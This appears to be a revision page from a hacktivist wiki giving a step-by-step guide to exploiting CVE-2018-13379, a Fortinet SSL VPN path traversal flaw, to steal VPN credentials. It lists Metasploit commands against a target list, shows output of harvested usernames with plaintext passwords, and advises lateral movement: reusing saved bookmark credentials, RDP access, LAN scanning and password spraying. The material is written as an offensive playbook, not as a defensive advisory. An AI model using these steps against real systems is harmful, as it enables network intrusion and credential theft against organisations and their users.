Fortinet SSL VPN Path Traversal: Difference between revisions
Jump to navigation
Jump to search
(Explanation on how to exploit CVE-2018-13379 [Basic]) |
|||
Line 2: | Line 2: | ||
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | ||
* Look for Bookmarks in the VPN console which have internal address and credentials already saved | * Look for Bookmarks in the VPN console which have internal address and credentials already saved | ||
* Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title= | * Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=Opsec_Measures Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here] | ||
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | * Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | ||
Revision as of 09:10, 5 July 2023
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
- Look for Bookmarks in the VPN console which have internal address and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use metasploit has it formats the credentials nicely for us. Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
user@host:~$ msfconsole StArting the Metasploit Framework console...
Search for and use the module for CVE-2018-13379:
msf6 > search CVE-2018-13379 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/fortios_vpnssl_traversal_creds_leak normal No FortiOS Path Traversal Credential Gatherer Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 > use 0 msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Set your targets:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt RHOSTS => file:targets.txt
Run the exploit module!
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run [*] https://10.10.10.11:10443 - Trying to connect. [+] https://10.10.10.11:10443 - Vulnerable!
View the credentials:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.10.11 10.10.10.11 10443/tcp (https) ddesjardins 8401327 Password 10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password 10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password 10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password 10.10.10.15 10.10.10.15 10443/tcp (https) hvac maplewoodHVAC! Password